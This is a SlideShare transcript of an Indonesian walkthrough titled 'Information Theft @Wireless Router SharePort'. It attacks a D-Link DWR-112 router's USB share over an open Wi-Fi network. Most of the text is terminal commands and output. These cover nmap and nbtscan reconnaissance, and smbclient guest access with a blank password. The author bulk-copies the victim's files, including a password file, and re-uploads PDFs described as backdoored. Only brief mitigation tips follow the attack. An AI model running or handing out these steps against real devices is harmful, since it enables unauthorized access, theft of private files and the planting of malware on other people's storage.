SlideShare une entreprise Scribd logo
1  sur  10
Télécharger pour lire hors ligne
1 
Information Theft 
@Wireless Router SharePort for Fun(D) 
by. SatanicBrain 
Pendahuluan 
Perkembangan teknologi router wireless semakin berkembang ke arah Network 
Storage, banyak sekali produk-produk router yang saat ini beredar dipasaran menyertakan 
port-port usb yang digunakan untuk sharing media penyipanan dan printer. Salah satu 
teknologinya adalah SharePort. 
SharePort merupakan teknologi baru yang banyak diterapkan pada radio wireless 
Access Point model-model terbaru, SharePort merupakan port usb yang biasa digunakan 
untuk Folder Sharing dan Printer Sharing. 
Tujuan adanya SharePort pada Access Point adalah agar user bisa mempergunakan 
media penyimpanannya yang berupa usb Flashdisk maupun harddisk secara remote melalui 
wireless, begitu juga dengan sharing printer yang diterapkannya agar user bisa melakukan 
pencetakan secara remote melalui wireless juga. 
Tanpa kita sadari pada teknologi tersebut sangatlah rentan terhadap tindakan 
penyerangan yang dapat menimbulkan kerugian yang sangat besar, yaitu : pencurian data, 
penghapusan data dan penanaman backdoor. 
Target Attacking 
Pada ujicoba kali ini,saya melakukan penyerangan terhadap devices dengan spesifikasi, 
sbb : 
 Access Point : D-Link 
 Series AP : DWR-112 
 Firmware version : 1.04 
 USB Port 1 : USB Hub yang terkonekasi USB Flashdisk dan Printer 
Persiapan Penyerangan 
 Notebook : Cukup notebook dengan wireless apa saja. 
 OS : Saya mempergunakan BT R3.
2 
Skenario Penyerangan 
Keterangan : 
 Attacker akan melakukan penyerangan terhadap SharePort yang terdapat pada Access 
Point melalui wireless. 
 Attacker akan masuk kedalam usb flashdisk maupun harddisk untuk melakukan 
pencurian data dan kegiatan lainnya. 
 Attacker pun bisa melakukan penyerangan terhadap printer.
3 
Melakukan Penyerangan 
1. Lakukan koneksi ke Access Point (AP) yang menjadi target. Cek koneksi ke AP : 
root@bt:~# iwconfig 
lo no wireless extensions. 
wlan0 IEEE 802.11abg ESSID:"lirva32_was_here" 
Mode:Managed Frequency:2.457 GHz Access Point: C8:BE:19:8C:37:A4 
Bit Rate=24 Mb/s Tx-Power=15 dBm 
Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management:off 
Link Quality=70/70 Signal level=-24 dBm 
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 
eth0 no wireless extensions. 
2. Setelah koneksi berhasil, maka kita akan mendapatkan IP dari DHCP server. Sudah 
menjadi kebiasaan jika AP didirikan selalu saja DHCP juga didirikan dengan tujuan 
untuk mempermudah user melakukan koneksi ke wireless AP. Cek dapat IP berapa dari 
DHCP Server : 
root@bt:~# ifconfig 
eth0 Link encap:Ethernet HWaddr 00:1d:72:19:45:4d 
UP BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 
Interrupt:16 
lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0 
inet6 addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING MTU:16436 Metric:1 
RX packets:474 errors:0 dropped:0 overruns:0 frame:0 
TX packets:474 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes:145389 (145.3 KB) TX bytes:145389 (145.3 KB) 
wlan0 Link encap:Ethernet HWaddr 00:1c:bf:00:5e:fb 
inet addr:192.168.0.100 Bcast:192.168.0.255 Mask:255.255.255.0 
inet6 addr: fe80::21c:bfff:fe00:5efb/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:1464 errors:0 dropped:0 overruns:0 frame:0 
TX packets:53 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:161210 (161.2 KB) TX bytes:7250 (7.2 KB) 
Nah, devices wlan0 sudah mendapat IP dari DHCP, yaitu : 192.168.0.100 /24
3. Network Scannning, lakukan network scanning untuk mendapatkan target dengan baik 
dan benar. Tadi kita sudah mendapatkan IP untuk wlan0 kan...?? yaitu : 192.168.0.100 
/24, maka kita akan lakukan proses network scanning 1 range IP yaitu : 192.168.0.1 - 
192.168.0.254. 
4 
root@bt:~# nmap -T4 -F 192.168.0.0/24 
Starting Nmap 6.25 ( http://nmap.org ) at 2013-03-26 10:26 WIT 
Nmap scan report for 192.168.0.1 
Host is up (0.0081s latency). 
Not shown: 95 closed ports 
PORT STATE SERVICE 
53/tcp open domain 
80/tcp open http 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
MAC Address: C8:BE:19:87:37:A4 (Unknown) 
Nmap scan report for 192.168.0.100 
Host is up (0.000021s latency). 
Not shown: 99 closed ports 
PORT STATE SERVICE 
80/tcp open http 
Nmap done: 256 IP addresses (2 hosts up) scanned in 34.24 second 
Hasil analisa : 
 Port 139/tcp open netbios-ssn. Port ini merupakan port Netbios Session Service 
yang biasanya digunakan untuk resource sharing pada windows. Contohnya adalah: 
Folder dan File Sharing, Printer Sharing. 
 Port 445/tcp open microsoft-ds. Port ini merupakan port Microsoft Directory Services 
yang biasanya digunakan untuk windows file sharing dan menyediakan banyak 
layanan lainnya. Port 445/ tcp juga ada sangkutannya dengan SMB over IP (SMB is 
known as "Samba"). Kedua Port tersebut yaitu : 139/tcp dan 445/tcp merupakan 
port yang sejak dulu dikenal sangat rentan untuk diserang. 
4. Mari kita lakukan proses scanning yang lebih mendalam terhadap IP yang sudah 
ditargetkan untuk mendapatkan informasi yang lebih lengkap lagi.
5 
root@bt:~# nmap -p 1-65535 -T4 -A -v 192.168.0.1 
Starting Nmap 6.25 ( http://nmap.org ) at 2013-03-26 10:57 WIT 
NSE: Loaded 106 scripts for scanning. 
NSE: Script Pre-scanning. 
Initiating ARP Ping Scan at 10:57 
Scanning 192.168.0.1 [1 port] 
Completed ARP Ping Scan at 10:57, 0.00s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of 1 host. at 10:57 
Completed Parallel DNS resolution of 1 host. at 10:57, 13.00s elapsed 
Initiating SYN Stealth Scan at 10:57 
Scanning 192.168.0.1 [65535 ports] 
Discovered open port 53/tcp on 192.168.0.1 
Discovered open port 80/tcp on 192.168.0.1 
Discovered open port 139/tcp on 192.168.0.1 
Discovered open port 445/tcp on 192.168.0.1 
Discovered open port 49152/tcp on 192.168.0.1 
Completed SYN Stealth Scan at 10:58, 32.92s elapsed (65535 total ports) 
Initiating Service scan at 10:58 
Scanning 5 services on 192.168.0.1 
Completed Service scan at 10:58, 11.22s elapsed (5 services on 1 host) 
Initiating OS detection (try #1) against 192.168.0.1 
NSE: Script scanning 192.168.0.1. 
Initiating NSE at 10:58 
Completed NSE at 10:58, 7.50s elapsed 
Nmap scan report for 192.168.0.1 
Host is up (0.0031s latency). 
Not shown: 65529 closed ports 
PORT STATE SERVICE VERSION 
1/tcp filtered tcpmux 
53/tcp open domain dnsmasq 2.45 
| dns-nsid: 
|_bind.version: dnsmasq-2.45 
80/tcp open http? 
|_http-favicon: Unknown favicon MD5: 107579220745D3B21461C23024D6C4A3 
|_http-methods: No Allow or Public header in OPTIONS response (status code 501) 
|_http-title: D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME 
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
49152/tcp open unknown 
- 
- 
- 
SF:99x2017:22:07x20GMTrnContent-Type:x20text/htmlrnContent-Length: 
SF:x20x20x20127rnrn<title>501x20Notx20Implemented</title>n<h1>501 
SF:x20Notx20Implemented</h1>nYourx20requestx20wasx20notx20understoo 
SF:dx20orx20notx20allowedx20byx20thisx20server.n"); 
MAC Address: C8:BE:19:87:37:A4 (Unknown) 
Device type: general purpose 
Running: Linux 2.6.X 
OS CPE: cpe:/o:linux:linux_kernel:2.6 
OS details: Linux 2.6.17 - 2.6.36 
Uptime guess: 0.054 days (since Tue Mar 26 09:41:33 2013) 
Network Distance: 1 hop 
TCP Sequence Prediction: Difficulty=206 (Good luck!) 
IP ID Sequence Generation: All zeros
6 
Host script results: 
| smb-os-discovery: 
| OS: Unix (Samba 3.0.24) 
| NetBIOS computer name: 
| Workgroup: WORKGROUP 
|_ System time: 2000-01-01T01:22:11+08:00 
| smb-security-mode: 
| Account that was used for smb scripts: guest 
| Share-level authentication (dangerous) 
| SMB Security: Challenge/response passwords supported 
|_ Message signing disabled (dangerous, but default) 
|_smbv2-enabled: Server doesn't support SMBv2 protocol 
TRACEROUTE 
HOP RTT ADDRESS 
1 3.12 ms 192.168.0.1 
NSE: Script Post-scanning. 
Read data files from: /usr/local/bin/../share/nmap 
OS and Service detection performed. Please report any incorrect results at 
http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 68.65 seconds 
Raw packets sent: 65681 (2.891MB) | Rcvd: 65630 (2.626MB) 
Hasil analisa : 
* 53/tcp open domain dnsmasq 2.45 
* http-title: D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME 
* 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
* 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
* MAC Address: C8:BE:19:87:37:A4 (Unknown) 
Device type: general purpose 
Running: Linux 2.6.X 
OS CPE: cpe:/o:linux:linux_kernel:2.6 
* Host script results: 
| smb-os-discovery: 
| OS: Unix (Samba 3.0.24) 
| NetBIOS computer name: 
| Workgroup: WORKGROUP 
|_ System time: 2000-01-01T01:22:11+08:00 
| smb-security-mode: 
| Account that was used for smb scripts: guest 
| Share-level authentication (dangerous) 
| SMB Security: Challenge/response passwords supported 
|_ Message signing disabled (dangerous, but default) 
|_smbv2-enabled: Server doesn't support SMBv2 protocol 
* Ternyata port 139/tcp dan 445/tcp mengaktifkan smbd 3.x dengan 
nama workgroup : WORKGROUP
7 
5. Llanjutkan pada proses berikutnya, yaitu mengidentifikasi smbd 3.x : 
root@bt:~# nbtscan 192.168.0.1 
Doing NBT name scan for addresses from 192.168.0.1 
IP address NetBIOS Name Server User MAC address 
------------------------------------------------------------------------------ 
192.168.0.1 DWR-112 <server> DWR-112 00-00-00-00-00-00 
root@bt:~# nbtscan -v -s : 192.168.0.1 
192.168.0.1:DWR-112 �:00U 
192.168.0.1:DWR-112 �:03U 
192.168.0.1:DWR-112 �:20U 
192.168.0.1:DWR-112 �:00U 
192.168.0.1:DWR-112 �:03U 
192.168.0.1:DWR-112 �:20U 
192.168.0.1:WORKGROUP �:00G 
192.168.0.1:WORKGROUP �:1eG 
192.168.0.1:WORKGROUP �:00G 
192.168.0.1:WORKGROUP �:1eG 
192.168.0.1:MAC:00-00-00-00-00-00 
Hasil analisa untuk smbd 3.x, yaitu : 
 IP : 192.168.0.1 
 NetBIOS Name : DWR-112 
 Server : <server> 
 User : DWR-112 
6. Nah, sekarang saatnya kita lanjut pada proses penyerangan kepada media 
penyimpanannya : 
root@bt:~# smbclient -L 192.168.0.1 
Enter root's password: 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24] 
Sharename Type Comment 
--------- ---- ------- 
Drive_A5 Disk Device(A) (SanDisk,Firebird USB Flash Drive) 
IPC$ IPC IPC Service (DWR-112) 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24] 
Server Comment 
--------- ------- 
Workgroup Master 
--------- ------- 
*ketika diminta password cukup tekan enter saja. 
Hasil analisa : 
 Sharename : Drive_A5, IPC$
8 
7. Kini saatnya memperdayai media penyimpanan target melalui smb console : 
root@bt:~# smbclient //DWR-112/Drive_A5 "" 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24] 
Server not using user level security and no password supplied. 
smb: > help 
? allinfo altname archive blocksize 
cancel case_sensitive cd chmod chown 
close del dir du echo 
exit get getfacl hardlink help 
history iosize lcd link lock 
lowercase ls l mask md 
mget mkdir more mput newer 
open posix posix_encrypt posix_open posix_mkdir 
posix_rmdir posix_unlink print prompt put 
pwd q queue quit rd 
recurse reget rename reput rm 
rmdir showacls setmode stat symlink 
tar tarmode translate unlock volume 
vuid wdel logon listconnect showconnect 
.. ! 
smb: > 
[01] Melihat status koneksi ke smb : 
smb: > showconnect 
//DWR-112/Drive_A5 
[02] Melihat isi usb flashdisk target : 
smb: > l 
. D 0 Thu Jan 1 07:00:00 1970 
.. D 0 Fri Dec 31 23:00:26 1999 
CCNA_Preparing D 0 Mon Nov 5 17:43:36 2012 
CCNA_Preparing - Copy D 0 Mon Nov 5 17:43:36 2012 
Copy please D 0 Wed Dec 5 13:51:24 2012 
ebook_pilihan D 8857314 Sat Nov 10 10:56:02 2012 
MODUL MIKROTIK D 0 Tue Aug 7 10:56:22 2012 
ModulWiFiOkeh_cetak D 0 Mon Dec 3 16:14:22 2012 
passwordspeedy.txt 471 Tue Nov 20 00:50:14 2012 
PENTESTER CAREER.pptx 3057314 Sat Nov 10 10:56:02 2012 
-* 
-* 
-* 
hal.dll 134400 Tue Aug 3 20:59:14 2004 
Modul DBA.docx 1027752 Wed Mar 13 15:29:54 2013 
ModulWireless_okeh_bgt.pdf 4624212 Fri Jan 11 10:40:48 2013 
60xx1 blocks of size 6xx36. 15141 blocks available
9 
[03] Mengambil isi usb flasdisk target : 
root@bt:/# mkdir /home/hasil 
root@bt:/# cd /home/hasil/ 
root@bt:/home/hasil# smbclient //DWR-112/Drive_A5 "" 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24] 
Server not using user level security and no password supplied 
smb: > mget *.* 
Get file 3030-3040.jpg? yes 
getting file 3030-3040.jpg of size 99947 as 3030-3040.jpg (1162.0 
KiloBytes/sec) (average 1162.0 KiloBytes/sec) 
- 
- 
Get file hal.dll? yes 
getting file hal.dll of size 134400 as hal.dll (1274.3 KiloBytes/sec) 
(average 915.5 KiloBytes/sec) 
Get file Modul_Wireless.pdf? yes 
getting file Modul_Wireless.pdf of size 5512257 as Modul_Wireless.pdf 
(2019.2 KiloBytes/sec) 
(average 2064.6 KiloBytes/sec) 
Get file Modul_wokShop2_cetak.doc? yes 
getting file Modul_wokShop2_cetak.doc of size 32209354 as 
Modul_wokShop2_cetak.doc (1850.8 KiloBytes/sec) 
(average 1917.6 KiloBytes/sec) 
[05] Menanam backdoor ke isi usb flasdisk target : 
Dowload file pdf dari usb target 
smb: ebook_pilihan> mget *.pdf 
Get file Modul_wokShop2.pdf? yes 
getting file jasakom_workshop2Modul_wokShop2.pdf of size 5627760 as 
Modul_wokShop2.pdf (2006.5 KiloBytes/sec) 
(average 2006.5 KiloBytes/sec) 
nah, sekarang file *.pdf sudah kita dapatkan, kini saatnya file *.pdf tersebut 
Anda sisipkan backdoor. Maaf, saya tidak menulis bagaimana menyisipkan 
backdoor kedalam *.pdf, silahkan dicari saja di google ;)
Setelah *.pdf Anda sisipkan backdoor, sekarang tinggal kita masukan saja 
*.pdf tersebut melalui smb console : 
smb: ebook_pilihan> mput *.pdf 
Put file Modul_wokShop2.pdf? yes 
putting file Modul_wokShop2.pdf as jasakom_workshop2Modul_wokShop2.pdf 
(1245.9 kb/s) (average 1245.9 kb/s) 
- 
- 
- 
Put file MICROSOFT SQL SERVER 7.pdf? yes 
putting file MICROSOFT SQL SERVER 7.pdf as jasakom_workshop2MICROSOFT 
SQL SERVER 7.pdf (1124.3 kb/s) 
(average 1209.3 kb/s) 
Melakukan Pengamanan 
Ada beberapa cara untuk mengurangi ketidak amanan, hanya mengurani saja 
kok, yaitu : 
1. Usahakan untuk tidak mempergunakan fasilitas shareport terhadap usb flashdisk yg kita 
10 
miliki 
2. Amankan koneksi wireless AP dengan WPS, WPA2 dan MAC Filter agar wireless kita tidak 
dipergunakan oleh pemakai yang tidak jelas. 
Referensi 
[1] http://www.samba.org/samba/docs/man/manpages-3/smbclient.1.html

Contenu connexe

Tendances

Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programming
kozossakai
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
Cyber Security Alliance
 
Programming TCP/IP with Sockets
Programming TCP/IP with SocketsProgramming TCP/IP with Sockets
Programming TCP/IP with Sockets
elliando dias
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 

Tendances (20)

Lecture10
Lecture10Lecture10
Lecture10
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programming
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Using metasploit
Using metasploitUsing metasploit
Using metasploit
 
20141106 asfws unicode_hacks
20141106 asfws unicode_hacks20141106 asfws unicode_hacks
20141106 asfws unicode_hacks
 
Programming TCP/IP with Sockets
Programming TCP/IP with SocketsProgramming TCP/IP with Sockets
Programming TCP/IP with Sockets
 
Linux network tools (Maarten Blomme)
Linux network tools (Maarten Blomme)Linux network tools (Maarten Blomme)
Linux network tools (Maarten Blomme)
 
Basic socket programming
Basic socket programmingBasic socket programming
Basic socket programming
 
Socket programming
Socket programmingSocket programming
Socket programming
 
Sockets
SocketsSockets
Sockets
 
Socket System Calls
Socket System CallsSocket System Calls
Socket System Calls
 
Networking lab
Networking labNetworking lab
Networking lab
 
44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar44CON London - Attacking VxWorks: from Stone Age to Interstellar
44CON London - Attacking VxWorks: from Stone Age to Interstellar
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
 
Socket programming
Socket programmingSocket programming
Socket programming
 
Network Sockets
Network SocketsNetwork Sockets
Network Sockets
 
IPC SOCKET
IPC SOCKETIPC SOCKET
IPC SOCKET
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Sockets in unix
Sockets in unixSockets in unix
Sockets in unix
 
Socket programming
Socket programmingSocket programming
Socket programming
 

En vedette

En vedette (17)

How to hack #IDSECCONF2014 ctf online challenge - nganggur
How to hack #IDSECCONF2014 ctf online challenge - nganggurHow to hack #IDSECCONF2014 ctf online challenge - nganggur
How to hack #IDSECCONF2014 ctf online challenge - nganggur
 
Penetration tool berbasis sistem terdistribusi untuk analisa vulnerability pa...
Penetration tool berbasis sistem terdistribusi untuk analisa vulnerability pa...Penetration tool berbasis sistem terdistribusi untuk analisa vulnerability pa...
Penetration tool berbasis sistem terdistribusi untuk analisa vulnerability pa...
 
Stolen e-money in 60sec - Tri Sumarno
Stolen e-money in 60sec - Tri SumarnoStolen e-money in 60sec - Tri Sumarno
Stolen e-money in 60sec - Tri Sumarno
 
Implementasi Sistem Pengamanan E-Commerce - Samsul Huda, Amang Sudarsono, Mik...
Implementasi Sistem Pengamanan E-Commerce - Samsul Huda, Amang Sudarsono, Mik...Implementasi Sistem Pengamanan E-Commerce - Samsul Huda, Amang Sudarsono, Mik...
Implementasi Sistem Pengamanan E-Commerce - Samsul Huda, Amang Sudarsono, Mik...
 
Firmware hacking, slash the pineapple for fun
Firmware hacking, slash the pineapple for funFirmware hacking, slash the pineapple for fun
Firmware hacking, slash the pineapple for fun
 
Write up idsecconf2015 online ctf
Write up idsecconf2015 online ctfWrite up idsecconf2015 online ctf
Write up idsecconf2015 online ctf
 
Laron aplikasi akuisisi berbasis sni 27037:2014 pada ponsel android
Laron aplikasi akuisisi berbasis sni 27037:2014 pada ponsel androidLaron aplikasi akuisisi berbasis sni 27037:2014 pada ponsel android
Laron aplikasi akuisisi berbasis sni 27037:2014 pada ponsel android
 
Various way of protecting your cloud server port - Abdullah
Various way of protecting your cloud server port - AbdullahVarious way of protecting your cloud server port - Abdullah
Various way of protecting your cloud server port - Abdullah
 
Studi dan implementasi keamanan user privacy menggunakan cp abe
Studi dan implementasi keamanan user privacy menggunakan cp abeStudi dan implementasi keamanan user privacy menggunakan cp abe
Studi dan implementasi keamanan user privacy menggunakan cp abe
 
Pendekatan secure by design pada cluster resource allocation untuk pusat data
Pendekatan secure by design pada cluster resource allocation untuk pusat dataPendekatan secure by design pada cluster resource allocation untuk pusat data
Pendekatan secure by design pada cluster resource allocation untuk pusat data
 
Rat malware android with raspberry pi server
Rat malware android with raspberry pi serverRat malware android with raspberry pi server
Rat malware android with raspberry pi server
 
Doan P. Sinaga, Alex F. Manihuruk, Kevin G.A.T. Pardosi - “Securing SCADA Sys...
Doan P. Sinaga, Alex F. Manihuruk, Kevin G.A.T. Pardosi - “Securing SCADA Sys...Doan P. Sinaga, Alex F. Manihuruk, Kevin G.A.T. Pardosi - “Securing SCADA Sys...
Doan P. Sinaga, Alex F. Manihuruk, Kevin G.A.T. Pardosi - “Securing SCADA Sys...
 
Charles Lim, Mario Marcello - “Sistem Pemantauan Ancaman Serangan Siber di In...
Charles Lim, Mario Marcello - “Sistem Pemantauan Ancaman Serangan Siber di In...Charles Lim, Mario Marcello - “Sistem Pemantauan Ancaman Serangan Siber di In...
Charles Lim, Mario Marcello - “Sistem Pemantauan Ancaman Serangan Siber di In...
 
Danang Jaya, Query Adika Rezylana - “Steganografi DCT dengan Memanfaatkan Apl...
Danang Jaya, Query Adika Rezylana - “Steganografi DCT dengan Memanfaatkan Apl...Danang Jaya, Query Adika Rezylana - “Steganografi DCT dengan Memanfaatkan Apl...
Danang Jaya, Query Adika Rezylana - “Steganografi DCT dengan Memanfaatkan Apl...
 
Agung Nugraha - “Layanan Certification Authority (CA), Document Signing and V...
Agung Nugraha - “Layanan Certification Authority (CA), Document Signing and V...Agung Nugraha - “Layanan Certification Authority (CA), Document Signing and V...
Agung Nugraha - “Layanan Certification Authority (CA), Document Signing and V...
 
B.Noviansyah - “National Public Key Infrastructure: Friend or Foe?"
B.Noviansyah - “National Public Key Infrastructure: Friend or Foe?"B.Noviansyah - “National Public Key Infrastructure: Friend or Foe?"
B.Noviansyah - “National Public Key Infrastructure: Friend or Foe?"
 
Muhammad Abrar Istiadi - “How to hack #IDSECCONF2016 ctf online challenge"
Muhammad Abrar Istiadi - “How to hack #IDSECCONF2016 ctf online challenge"Muhammad Abrar Istiadi - “How to hack #IDSECCONF2016 ctf online challenge"
Muhammad Abrar Istiadi - “How to hack #IDSECCONF2016 ctf online challenge"
 

Similaire à Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhartono

3 scanning-ger paoctes-pub
3  scanning-ger paoctes-pub3  scanning-ger paoctes-pub
3 scanning-ger paoctes-pub
Cassio Ramos
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
Raghunath G
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
Freddy Buenaño
 

Similaire à Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhartono (20)

Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
R bernardino hand_in_assignment_week_1
R bernardino hand_in_assignment_week_1R bernardino hand_in_assignment_week_1
R bernardino hand_in_assignment_week_1
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hacking
 
3 scanning-ger paoctes-pub
3  scanning-ger paoctes-pub3  scanning-ger paoctes-pub
3 scanning-ger paoctes-pub
 
Linux router
Linux routerLinux router
Linux router
 
Stu t17 a
Stu t17 aStu t17 a
Stu t17 a
 
Hacking Cisco
Hacking CiscoHacking Cisco
Hacking Cisco
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network Forensics
 
Netcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army KnifeNetcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army Knife
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
 
Handy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemHandy Networking Tools and How to Use Them
Handy Networking Tools and How to Use Them
 
6005679.ppt
6005679.ppt6005679.ppt
6005679.ppt
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
packet traveling (pre cloud)
packet traveling (pre cloud)packet traveling (pre cloud)
packet traveling (pre cloud)
 
Pentesting layer 2 protocols
Pentesting layer 2 protocolsPentesting layer 2 protocols
Pentesting layer 2 protocols
 
class12_Networking2
class12_Networking2class12_Networking2
class12_Networking2
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
 

Plus de idsecconf

Plus de idsecconf (20)

idsecconf2023 - Mochammad Riyan Firmansyah - Takeover Cloud Managed Router vi...
idsecconf2023 - Mochammad Riyan Firmansyah - Takeover Cloud Managed Router vi...idsecconf2023 - Mochammad Riyan Firmansyah - Takeover Cloud Managed Router vi...
idsecconf2023 - Mochammad Riyan Firmansyah - Takeover Cloud Managed Router vi...
 
idsecconf2023 - Neil Armstrong - Leveraging IaC for Stealthy Infrastructure A...
idsecconf2023 - Neil Armstrong - Leveraging IaC for Stealthy Infrastructure A...idsecconf2023 - Neil Armstrong - Leveraging IaC for Stealthy Infrastructure A...
idsecconf2023 - Neil Armstrong - Leveraging IaC for Stealthy Infrastructure A...
 
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...
idsecconf2023 - Mangatas Tondang, Wahyu Nuryanto - Penerapan Model Detection ...
 
idsecconf2023 - Rama Tri Nanda - Hacking Smart Doorbell.pdf
idsecconf2023 - Rama Tri Nanda - Hacking Smart Doorbell.pdfidsecconf2023 - Rama Tri Nanda - Hacking Smart Doorbell.pdf
idsecconf2023 - Rama Tri Nanda - Hacking Smart Doorbell.pdf
 
idsecconf2023 - Akshantula Neha, Mohammad Febri Ramadlan - Cyber Harmony Auto...
idsecconf2023 - Akshantula Neha, Mohammad Febri Ramadlan - Cyber Harmony Auto...idsecconf2023 - Akshantula Neha, Mohammad Febri Ramadlan - Cyber Harmony Auto...
idsecconf2023 - Akshantula Neha, Mohammad Febri Ramadlan - Cyber Harmony Auto...
 
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
 
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
 
Ali - The Journey-Hack Electron App Desktop (MacOS).pdf
Ali - The Journey-Hack Electron App Desktop (MacOS).pdfAli - The Journey-Hack Electron App Desktop (MacOS).pdf
Ali - The Journey-Hack Electron App Desktop (MacOS).pdf
 
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
 
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdf
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdfRama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdf
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdf
 
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...
 
Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdf
Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdfNosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdf
